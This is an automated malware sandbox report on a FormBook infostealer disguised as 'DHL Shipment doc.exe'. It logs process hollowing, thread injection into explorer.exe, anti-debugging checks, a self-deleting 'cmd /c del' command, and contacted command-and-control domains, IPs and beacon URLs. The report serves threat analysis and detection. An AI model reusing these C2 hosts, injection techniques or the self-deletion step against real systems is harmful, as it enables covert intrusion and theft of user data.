          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D05210 mov ecx, dword ptr fs:[00000030h]11_2_04D05210
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D05210 mov eax, dword ptr fs:[00000030h]11_2_04D05210
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D05210 mov eax, dword ptr fs:[00000030h]11_2_04D05210
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D0AA16 mov eax, dword ptr fs:[00000030h]11_2_04D0AA16
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D0AA16 mov eax, dword ptr fs:[00000030h]11_2_04D0AA16
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DCAA16 mov eax, dword ptr fs:[00000030h]11_2_04DCAA16
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DCAA16 mov eax, dword ptr fs:[00000030h]11_2_04DCAA16
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D23A1C mov eax, dword ptr fs:[00000030h]11_2_04D23A1C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D18A0A mov eax, dword ptr fs:[00000030h]11_2_04D18A0A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D44A2C mov eax, dword ptr fs:[00000030h]11_2_04D44A2C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D44A2C mov eax, dword ptr fs:[00000030h]11_2_04D44A2C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D853CA mov eax, dword ptr fs:[00000030h]11_2_04D853CA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D853CA mov eax, dword ptr fs:[00000030h]11_2_04D853CA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D303E2 mov eax, dword ptr fs:[00000030h]11_2_04D303E2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D303E2 mov eax, dword ptr fs:[00000030h]11_2_04D303E2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D303E2 mov eax, dword ptr fs:[00000030h]11_2_04D303E2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D303E2 mov eax, dword ptr fs:[00000030h]11_2_04D303E2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D303E2 mov eax, dword ptr fs:[00000030h]11_2_04D303E2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D303E2 mov eax, dword ptr fs:[00000030h]11_2_04D303E2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D2DBE9 mov eax, dword ptr fs:[00000030h]11_2_04D2DBE9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D3B390 mov eax, dword ptr fs:[00000030h]11_2_04D3B390
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D32397 mov eax, dword ptr fs:[00000030h]11_2_04D32397
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DC138A mov eax, dword ptr fs:[00000030h]11_2_04DC138A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DBD380 mov ecx, dword ptr fs:[00000030h]11_2_04DBD380
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D11B8F mov eax, dword ptr fs:[00000030h]11_2_04D11B8F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D11B8F mov eax, dword ptr fs:[00000030h]11_2_04D11B8F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DD5BA5 mov eax, dword ptr fs:[00000030h]11_2_04DD5BA5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D34BAD mov eax, dword ptr fs:[00000030h]11_2_04D34BAD
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D34BAD mov eax, dword ptr fs:[00000030h]11_2_04D34BAD
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D34BAD mov eax, dword ptr fs:[00000030h]11_2_04D34BAD
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DD8B58 mov eax, dword ptr fs:[00000030h]11_2_04DD8B58
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D0F358 mov eax, dword ptr fs:[00000030h]11_2_04D0F358
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D0DB40 mov eax, dword ptr fs:[00000030h]11_2_04D0DB40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D33B7A mov eax, dword ptr fs:[00000030h]11_2_04D33B7A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D33B7A mov eax, dword ptr fs:[00000030h]11_2_04D33B7A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D0DB60 mov ecx, dword ptr fs:[00000030h]11_2_04D0DB60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DC131B mov eax, dword ptr fs:[00000030h]11_2_04DC131B
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 3_2_00409B50 LdrLoadDll,3_2_00409B50
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.bbgm4egda.xyz
          Source: C:\Windows\explorer.exeDomain query: www.metronixmedical.com
          Source: C:\Windows\explorer.exeDomain query: www.auctions.email
          Source: C:\Windows\explorer.exeDomain query: www.klopert77.com
          Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.72 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 35.213.137.92 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 64.190.62.111 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.solatopotato.com
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: EC0000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: unknown protection: read writeJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeThread register set: target process: 3424Jump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeThread register set: target process: 3424Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread register set: target process: 3424Jump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess created: C:\Users\user\Desktop\DHL Shipment doc.exe C:\Users\user\Desktop\DHL Shipment doc.exeJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess created: C:\Users\user\Desktop\DHL Shipment doc.exe C:\Users\user\Desktop\DHL Shipment doc.exeJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exeJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exeJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\DHL Shipment doc.exe"Jump to behavior
          Source: explorer.exe, 00000006.00000000.695852075.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.767118956.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.733166443.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.715605590.0000000000AD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000006.00000000.733753487.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.715899301.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.767387200.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.696692590.0000000001080000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000000.719824080.0000000005E50000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.733753487.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.715899301.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.767387200.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.696692590.0000000001080000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.733753487.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.715899301.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.767387200.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.696692590.0000000001080000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.733753487.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.715899301.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.767387200.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.696692590.0000000001080000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000006.00000000.746158285.000000000A716000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.724490160.000000000A716000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.708216741.000000000A716000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeQueries volume information: C:\Users\user\Desktop\DHL Shipment doc.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.0.DHL Shipment doc.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.DHL Shipment doc.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.DHL Shipment doc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.DHL Shipment doc.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.DHL Shipment doc.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.DHL Shipment doc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.DHL Shipment doc.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000000.738326469.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.941125718.0000000004B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.804375407.00000000016D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.689082555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.720424753.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.940941423.0000000004B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.688266335.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.799667944.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.693081041.0000000004419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.0.DHL Shipment doc.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.DHL Shipment doc.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.DHL Shipment doc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.DHL Shipment doc.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.DHL Shipment doc.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.DHL Shipment doc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.DHL Shipment doc.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000000.738326469.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.941125718.0000000004B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.804375407.00000000016D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.689082555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.720424753.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.940941423.0000000004B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.688266335.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.799667944.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.693081041.0000000004419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules          		1
          DLL Side-Loading          		512
          Process Injection          		1
          Masquerading          		1
          Input Capture          		221
          Security Software Discovery          		Remote Services1
          Input Capture          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          DLL Side-Loading          		1
          Disable or Modify Tools          		LSASS Memory2
          Process Discovery          		Remote Desktop Protocol11
          Archive Collected Data          		Exfiltration Over Bluetooth3
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
          Virtualization/Sandbox Evasion          		Security Account Manager31
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)512
          Process Injection          		NTDS1
          Remote System Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer13
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
          Deobfuscate/Decode Files or Information          		LSA Secrets112
          System Information Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common4
          Obfuscated Files or Information          		Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items13
          Software Packing          		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          Timestomp          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
          DLL Side-Loading          		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
          File Deletion          		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 568428 Sample: DHL Shipment doc.exe Startdate: 08/02/2022 Architecture: WINDOWS Score: 100 32 www.webfactory.agency 2->32 34 www.adwin-estate.com 2->34 36 webfactory.agency 2->36 54 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 9 other signatures 2->60 10 DHL Shipment doc.exe 3 2->10         started        signatures3 process4 file5 30 C:\Users\user\...\DHL Shipment doc.exe.log, ASCII 10->30 dropped 13 DHL Shipment doc.exe 10->13         started        16 DHL Shipment doc.exe 10->16         started        process6 signatures7 62 Modifies the context of a thread in another process (thread injection) 13->62 64 Maps a DLL or memory area into another process 13->64 66 Sample uses process hollowing technique 13->66 68 Queues an APC in another process (thread injection) 13->68 18 msiexec.exe 13->18         started        21 explorer.exe 13->21 injected 24 autoconv.exe 13->24         started        process8 dnsIp9 44 Self deletion via cmd delete 18->44 46 Modifies the context of a thread in another process (thread injection) 18->46 48 Maps a DLL or memory area into another process 18->48 26 cmd.exe 1 18->26         started        38 solatopotato.com 81.169.145.72, 49841, 80 STRATOSTRATOAGDE Germany 21->38 40 www.auctions.email 64.190.62.111, 49839, 80 NBS11696US United States 21->40 42 5 other IPs or domains 21->42 50 System process connects to network (likely due to code injection or exploit) 21->50 52 Performs DNS queries to domains with low reputation 21->52 signatures10 process11 process12 28 conhost.exe 26->28         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          DHL Shipment doc.exe35%ReversingLabsWin32.Trojan.Swotter
          DHL Shipment doc.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          3.0.DHL Shipment doc.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.0.DHL Shipment doc.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.2.DHL Shipment doc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.0.DHL Shipment doc.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          www.floridanratraining.com/how6/100%Avira URL Cloudmalware
          http://www.metronixmedical.com/how6/?W6vtR=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGUt6OvGQoWpI&pN6=9ri0dbnPLFLdd0%Avira URL Cloudsafe
          http://www.solatopotato.com/how6/?W6vtR=4EPEhjHsb2zicvYNP8lD0qzrINMa8IRsv4Cq+fHosD6XE0pK2EAVk/7C/sJ+vhveOIRa&pN6=9ri0dbnPLFLdd0%Avira URL Cloudsafe
          http://www.auctions.email/how6/?W6vtR=0inXDaq5MxudMpH6GZOYsbvs/BtQ0SlGgc0yMNKfti2SPFqDmOiUae5rQ5wMEYlWCo0z&pN6=9ri0dbnPLFLdd100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.metronixmedical.com
          		35.213.137.92
          		truefalse
            		unknown
            webfactory.agency
            		34.102.136.180
            		truetrue
              		unknown
              solatopotato.com
              		81.169.145.72
              		truetrue
                		unknown
                www.adwin-estate.com
                		37.140.192.43
                		truetrue
                  		unknown
                  www.auctions.email
                  		64.190.62.111
                  		truetrue
                    		unknown
                    www.bbgm4egda.xyz
                    		unknown
                    		unknowntrue
                      		unknown
                      www.webfactory.agency
                      		unknown
                      		unknowntrue
                        		unknown
                        www.solatopotato.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.klopert77.com
                          		unknown
                          		unknowntrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            www.floridanratraining.com/how6/true
                            • Avira URL Cloud: malware
                            		low
                            http://www.metronixmedical.com/how6/?W6vtR=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGUt6OvGQoWpI&pN6=9ri0dbnPLFLddfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.solatopotato.com/how6/?W6vtR=4EPEhjHsb2zicvYNP8lD0qzrINMa8IRsv4Cq+fHosD6XE0pK2EAVk/7C/sJ+vhveOIRa&pN6=9ri0dbnPLFLddtrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.auctions.email/how6/?W6vtR=0inXDaq5MxudMpH6GZOYsbvs/BtQ0SlGgc0yMNKfti2SPFqDmOiUae5rQ5wMEYlWCo0z&pN6=9ri0dbnPLFLddtrue
                            • Avira URL Cloud: malware
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            81.169.145.72
                            		solatopotato.comGermany
                            		6724STRATOSTRATOAGDEtrue
                            35.213.137.92
                            		www.metronixmedical.comUnited States
                            		15169GOOGLEUSfalse
                            64.190.62.111
                            		www.auctions.emailUnited States
                            		11696NBS11696UStrue

                            Private

                            IP
                            192.168.2.1

                            General Information

                            Joe Sandbox Version:34.0.0 Boulder Opal
                            Analysis ID:568428
                            Start date:08.02.2022
                            Start time:11:20:36
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 11m 2s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:DHL Shipment doc.exe
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:22
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:1
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@12/1@7/4
                            EGA Information:
                            • Successful, ratio: 75%
                            HDC Information:
                            • Successful, ratio: 23% (good quality ratio 20.7%)
                            • Quality average: 70.6%
                            • Quality standard deviation: 32.3%
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 60
                            • Number of non-executed functions: 130
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .exe

                            Warnings

                            • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                            • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                            • Execution Graph export aborted for target DHL Shipment doc.exe, PID 5820 because there are no executed function
                            • Not all processes where analyzed, report is missing behavior information

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            11:21:38API Interceptor1x Sleep call for process: DHL Shipment doc.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            81.169.145.72DRAFT BILL OF LADING S2105860598.exeGet hashmaliciousBrowse
                            • www.greencrowns.net/mc6b/?6l9=tpNj4PjXoKWCsmm1Y6MR7HF8CUHGesrjjdgatdbLN+CAnZUlSrcA+B/aerLHVANnn/4x&A0Dxkn=lZSl
                            DHL - FINAL REMINDER -Receiver Address verification.exeGet hashmaliciousBrowse
                            • www.solatopotato.com/s6ap/?E2Mlq2x=okyxdAp+W67+fAYowcnO6UQ0Kr6FK72FyoQineJing55OW83TSWJUcsTCsRP5GOWD7ZgqtuoBw==&1b6tX=ChPDHL
                            Swift Copy.exeGet hashmaliciousBrowse
                            • www.mademommyproud.com/eods/?aBC8lvE=KVfb1sso6bW67nogjanaap/bozo2JbafojZUFGUzExzuZC7846Rtg3ForN4hCG2lsCAc&G4=Tbut2rPX
                            SOA.exeGet hashmaliciousBrowse
                            • www.mademommyproud.com/eods/?O6Ahsf=cTvhJXFXfVEpb4hp&0488qv=KVfb1sso6bW67nogjanaap/bozo2JbafojZUFGUzExzuZC7846Rtg3ForN4hCG2lsCAc
                            VSP-88D-Neo1-F YX20210315086 KSAI21061536.xlsxGet hashmaliciousBrowse
                            • www.my-ela.com/bp3i/?B6d=x3Xsx3kC7fI6l4kxK35QZMI5K2UCf+f3EJo6s08DD7agpFQ+QRU8y+xFC1ojc+C/Sn3r+A==&dtxhA=pTk8BXLpbZoXfRy
                            gz7dLhKlSQ.exeGet hashmaliciousBrowse
